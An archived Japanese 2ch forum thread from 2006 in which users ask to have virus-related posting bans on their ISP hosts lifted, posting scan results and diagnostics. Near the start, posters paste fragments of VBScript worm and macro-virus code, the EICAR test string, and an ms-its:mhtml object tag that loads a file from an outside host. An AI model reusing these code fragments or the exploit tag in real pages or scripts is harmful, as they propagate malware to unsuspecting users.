□規制解除要望□ ウイルス焼き専用★1【PROXY規制中!】
■ このスレッドは過去ログ倉庫に格納されています
今日、俺が丁寧な口調で警告出すようお願いしておいたから
2〜3日様子みてくれ。 http://live14.2ch.net/test/read.cgi/liveplus/1154796117/
ここのスレをクリックするとウイルス検出されるぞ
なんなんこれw意味わからん こんなの初めてだ
sage ms-its:mhtml:file://c:\[ これが原因? あーーーー
上記のsage re 張ったらここも検出された
スマソ・・・・・・・・ <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)) 2人も駆除してくださったという収穫。
再発したらまた対応できるんじゃないでしょうか。
解除することで、荒らされるかもしれないスレ、
対応していただけなければならないRockerさん、etc
多くの方にご迷惑を掛けることも、そりゃあるかもしれないですが。
そういうことに細かく対応できるための人海戦術なんじゃないかなっと。
#あくまで単なる野次馬として。 一応転載
http://qb5.2ch.net/test/read.cgi/sec2chd/1154777583/48
48 生姜焼き ★ sage 2006/08/06(日) 10:01:41 ID:???0 @
とはいっても確かに「少なくとも2人はいる」のは確認してるけど
3人目がいるかどうかはわからないんですよね
さて、どうしましょ?>焼きのみなさん > asf-cable.c-able.ne.jpのみなさま
一応解除しましたが、再発した場合は再び焼きますので、
それだけはご承知下さい。 >>340の続きということで見てください
解除要請の理由といたしましては
・感染者リストの2人のウイルス駆除が完了したこと
・3人目の感染者がいるという根拠がないこと
・プロバイダ側で感染者を特定したとしても リストを手がかりにするため リストの2人以外の感染者を特定することは不可能なこと
・今回規制されたのは この2人の感染が確認されたためだということ
・3人目の感染者の存在を疑う場合 他の規制されてないホストのことはどうなるのか キリがない
の点です
>>343
解除されたようですね
ありがとうございます これで後は30分ぐらい待てばスレに書き込めるようになるのかな…? 全鯖に浸透するには、時間差がありますのでしばしお待ちを。 お客様
平素は大変お世話になっております。
レオパレス21ブロードバンド事務局 河上と申します。
お問合せ頂きました件につきましてご回答申し上げます。
お客様ご申告の件に関しまして弊社にて状況の確認を
させて頂きますので、今しばらくお待ち下さいませ。
なお、状況によりお時間がかかる場合がございますので
予めご了承の程宜しくお願い致します。
ご不明な点は下記コールセンターまでお問い合わせをお願い致します。
今後ともレオパレス21を何卒宜しくお願い申し上げます。
これってウイルス所持者の調査をして対応してくれるってことでFA? >>350
ちょっと解除してみましたー。
暫くたったら浸透すると思いますー。 >>351
同じく規制中の「gk8.leo-net.jp」は解除になりましたでしょうか?
同じレオネットとして気になっております。leo-net.jp全体の解除なのか
それともgk3だけの解除なのか、よろしければ教えてください。 それはgk8のホスト名で>>350と同じような返答貰うまで無理なんじゃないかねぇ >>354
既に書けてるようです。全体じゃないですか? >>354
俺も8だけどよそでは書けた。でもこの板ではかけない・・・ -- Your diagnosis --
Date of issue: Sun Aug 6 19:00:10 2006
IP Address:202.122.192.129
RemoteHost:vip1.lcv.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER : http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLG,GGLG:2006-16,GGLG:ja&q=%E9%A2%A8%E5%91%82%E6%95%B7%E3%80%80%E7%A2%BA%E8%AA%8D
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 202.122.192.129
REMOTE_HOST : vip1.lcv.ne.jp
REMOTE_PORT : 36304
-- DSBL --
202.122.192.129 -> None(^-^)
-- BBQ --
202.122.192.129 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
202.122.192.129 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
202.122.192.129 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
金曜日からだめなんですが・・・
とりあえず第一には自らのウイルスチェックですなあ >>361
書き込めました。
ありがとうございました。 山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。
あー、規制解除されてましたね。
申し訳ありませんでした。 >>235ということは解除していただけるのでしょうか?
当方CATVの共有ホストで8/4からウイルス焼きされています 株式会社レオパレス21様より書き込みできないとの連絡がありました。
それで返答しようと思ったのですがウィルス焼きされた日時を確認
出来ませんでしたのでご存じの方がいらっしゃいましたらよろしく
お願いします。 >>370 ログでは以下の通り残ってました。
gk8.leo-net.jp 2006/08/04(Fri) 02:24:30
gk3.leo-net.jp 2006/08/03(Thu) 22:12:36
#今は解除済み -- Your diagnosis --
Date of issue: Mon Aug 7 07:30:02 2006
IP Address:219.117.176.253
RemoteHost:white1.scn-net.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 219.117.176.253
REMOTE_HOST : white1.scn-net.ne.jp
REMOTE_PORT : 43987
-- DSBL --
219.117.176.253 -> None(^-^)
-- BBQ --
219.117.176.253 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
219.117.176.253 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
219.117.176.253 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ERROR:公開PROXYからの投稿は受け付けていません!!(1)と出ます
診断書をむやみに貼る人は、
スレをまるで読んでないとみなされスルーされます。 >>372です。
2日前から書き込みが出来なくなりました。
【DSBL】PROXY規制中!【報告無用】のスレを見ても何がなんだか分からなくて・・・。
ウイルススキャンしたところウイルスは検出されていませんでした。
ケーブル系なんですが、ブロバイダに相談すれば解除できるのでしょうか? 4日ほど前に山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。 湘南ケーブルネットワーク様より書き込み規制についての問い合わせが
ありました。
ウィルス焼きの原因のログが見つかりませんでしたのでご存じの方が
いらっしゃいましたらよろしくお願いします。 さきほどふしあなで書き込もうとしたら連投規制が出ました
ウイルススキャンしたら書き込めるようになりました。
愛媛catvは私が原因でしょうか?
ウイルスは、newsvip、マカフィーで削除しました >>376
これかな?
http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd_sv=&kwd_host=scn-net.ne.jp
sakura02.bbspink.com 2006/08/04(金) 00:06:31 white1.scn-net.ne.jp
http://halcyan.30.kg/klist/list.php?filepattern=-106-7-&kwd_sv=&kwd_host=scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 02:08:20 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:21:05 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:17 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:10 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:07:49 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:58:48 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:53:57 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:49:51 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:46:08 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:45:15 white1.scn-net.ne.jp
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/94
white2.scn-net.ne.jp 18res
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1129185674/950,958,968
white5.scn-net.ne.jp
ログ5G超えてた・・おrz >>378補足
虹のポストは全部追っていません。
一部かも ip family.e-catv.ne.jp 219.109.48.4で規制を受けたのは私のようです。
2ちゃんのせんぶらの過去ログに感染していたようです、ノートン先生で検出して削除しました。
WScript.KakWorm Bloodhound.Exploit.6 Macro.src Unix.Penguin
4つのウイルスが出ました。
一応これで問題解決したようなので、規制解除をお願いしたいのですが・・・ それいわゆる「ウイルスコード」に反応しただけじゃ? さっきはマカフィーでも3つ引っかかったんですよ
それに別のところ規制スレで私が任意でつけたIPが乗ってたんですよ
687 名前:AirRock ★ 投稿日:2006/08/06(日) 18:38:40 ???0
お願いします。
comic6 2006/08/06(日) 14:47:38〜18:30:00
共有
family.e-catv.ne.jp 219.109.48.4
689 名前:生姜焼き ★ 投稿日:2006/08/06(日) 18:56:26 ???0
>>687
全部焼きましたー
※family.e-catv.ne.jpは共有とはいえ多いので焼きました
参考
http://halcyan.30.kg/klist/list.php?filepattern=106-8&kwd_sv=comic6&kwd_host=family.e-catv.ne.jp >>384
あなたのIPは共有ですから
たくさんの人が同じものを使っています >>385
リモートホストとは別の219.109.48.4はうちのルータをいじってかえたものなんですが・・・
ウイルス爆撃相談所にはそのipが張られていたんですよ
一応、ノートントラップだけでなく、マカフィーでも3つファイルが出たんで・・・
あなたはもっとご自分のネット環境について知識を実に付けた方がよい
family.e-catv.ne.jpというリモホを変えられるなら今ここで変えてみなさい >>386
あと family.e-catv.ne.jp ←リモートホスト
219.109.48.4 ←IP
ただ変換しただけだから
参考 ttp://www.ghiblies.net/cgi-bin/host/ まあ、問題ないなら別にいいです
マクァフィーのほうもノートンと同じところから検出しましたし
つまり規制の場合はリモホからしか解らんのですな。
個々のルータで設定しているアドレスは関係なしで で2chの過去ログのとこにあるってのは今回のウイルスとは全く無関係です
>>382-383の通りです そうでした、ルータで変えれるやつはグローバルipとか言うのに変えたんでした、忘れてました。
お手数かけました。どうも。
では愛媛catvに抗議してきます >>392
頼みましたぞ・・・早く・・・規制解除・・・を・・・ >>393
あなたもしなさいよ
抗議するユーザーが多ければ、それだけ対応が早まるでしょ -- Your diagnosis --
Date of issue: Mon Aug 7 22:41:16 2006
IP Address:219.124.202.69
RemoteHost:kctv58069.ccnw.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP________________ : ~~~~~ ~~~~~~~
REMOTE_ADDR : 219.124.202.69
REMOTE_HOST : kctv58069.ccnw.ne.jp
REMOTE_PORT : 1881
-- DSBL --
219.124.202.69 -> None(^-^)
-- BBQ --
219.124.202.69 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
219.124.202.69 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
219.124.202.69 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
山田ウィルス治しました。
よろしくお願いします。 >>397
つ【テンプレ】
・名前欄に「fusianasan」と入れてあなたのホストを表示
・使用したアンチウィルスソフトorサービス(無論、ウイルス定義は最新で)
・ウィルス定義のエンジンバージョン・DATバージョン
・見つかった(駆除した)ウィルスの名称 >>398に追加
診断書をコピペして貼った場合は、スレを全く読んでいないものとみなされて
対応されません(>>274 >>313-314 >>399)
要するに、診断書を貼る=「対処しなくて構いません」と書いたのと同じ
共有IP云々と言われた場合は>>318 >>397
本当に申し訳ございませんでした。
クリーンインストールしましたので、もう大丈夫です。
感染ファイル元は「山田ウィルスチェッカー.exe」
ウィルス名は「Backdoor.Trojan」(Norton AntiVirus 2005で確認しました。)
ウィルス定義ファイルは2006/08/03です。 >>401
すいません。新しい書き込みを見てませんでした。
レスやスレで調べてきます。 kctv58069.ccnw.ne.jpさん、
解除しました
全板に書けるようになるまではもうしばらくかかります
のんびりお茶でも飲んでもうちょっと待っててください カスペルスキー オンラインスキャナ
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.78.0
感染: Backdoor.Win32.Delf.afu
削除しました 使用したアンチウィルスソフト:ウイルスバスター2006
ウィルスの名称:
TSPY_LINEAGE.UE
HTML_CRINET.A
ウイルス隔離
ウイルスが見つかった感染ファイルが、隔離フォルダに移動されました。
隔離されたファイルは、そのまま放置しても問題ありません。
と、出ました。
それと、半角二次のみにウイルスの影響が有るのでしたら、
半角二次以外の規制はどうにかならないのでしょうか?
個人的に、21歳でもないので他の板に書き込みたいのですが…。
再発の恐れがあるのでしたら、半角二次のみに規制を入れてくれませんか?
ついでに答えて下されば光栄で御座います。 ウィルスバスター2006とノートンでチェック済み
ウィルス検出されませんでした
規制解除してください 愛媛catvは
よくわからないから何もできませんと抜かしました。
いったい我々愛媛県人はどうすればいんでしょう・・・・
>>408
うーん。
どちらも焼きの原因になったウィルスとは違うような感じ >>413
あなたの焼かれている原因はウィルスです。
TSPY_LINEAGE.UE
HTML_CRINET.A
以外に駆除できていないウィルスがまだあるんじゃないかと。 使用したソフト:AVGを使用しました。
ウイルスファイル定義:06/08/03です。
ウイルス名:Trojan horse Generic.YRKです。
感染ファイル元:山田ウイルスチェッカー.exeでした。
規制解除をお願いいたします。
>>414
もしかしてコレでしょうか?
TSPY_LINEAGE.YS
使用したものと、対処は>>408と同じです。駆除いたしました。
最新版にアップデートをして新たに検索しましが、
他にウイルスは見つかりませんでした。 >>418
同じウィルスソフトを使っても
対応状況はあまり変わらないかもしれないので
別のソフトを試してもらえますか?
カスペルスキーオンラインスキャナ
http://www.kaspersky.co.jp/scanforvirus/ >>409です
ノートンでチェックをかけたら
Bloodhound.Exploit.
Macro.src
VBS.Freelink.B
WScript.KakWorm
が検出されました。
いずれもJaneのログに感染していて
駆除も完了しています。
規制解除をお願いします。 ノートンでチェックしたらトロイの木馬(細かい名前は忘れました)が検出されました
ノートンとバスターをはしごしたので駆除は終わったと思います
ウイルスが原因でしたら解除お願いします Backdoor.Trojan
ノートンで出たのはたしかこの名前だったと思います
バスターでは何も検出されませんでした 再度ノートンをかけましたが、
何も検出されませんでした。
問題がなければ解除してください。 先のオンラインスキャナを使った
Trojan.Win32.KillFiles.k
Trojan.Win32.VB.aqp
Trojan.Win32.Haradong.a
WExploit.HTML.CodeBaseExec
oExploit.HTML.Mht
rm.Win32.Antinny.ao 検出されました
IPアドレスとリモートホスト名
Your IP address is 221.80.198.171
Your RemoteHost is softbank221080198171.bbtec.net
>>372 >>376 >>378
これはつまりこういうこと?
・SCNユーザーの誰かがウイルスに感染しているのでアクセスを禁止された
・SCN側は2chに問い合わせを入れその事実を確認した
・しかし今だ対応は取られておらず今もアクセスは禁止されたまま 解除されるまで時間がかかるのでしょうか
マターリ待ちます >>429
・SCNユーザーの誰かがウイルスに感染しているのでアクセスを禁止された
・SCNユーザーの有志がSCNに感染してる奴がいるから、なんとかしてくれと連絡を入れた
・SCNから、2chセキュリティに問い合わせがあった
・2chセキュリティが該当ログをSCNに送った
・それを元に、SCNは今該当者を割り出し中(多分)←今ここら辺
・SCNは該当者が分かれば警告し対応が終わったら、2chに連絡が来る(多分)
・そしたら、規制は解かれるかも知れない(゚д゚)ウマー どうしてふしあなしてもこのスレにかけないのはなんでだぜ? >>429
SCNに問い合わせてみたら解除に一ヶ月掛かるそうな。orz
その前にウイルスの活動量が少なくなれば解除されるらしいけど・・・。 ■ このスレッドは過去ログ倉庫に格納されています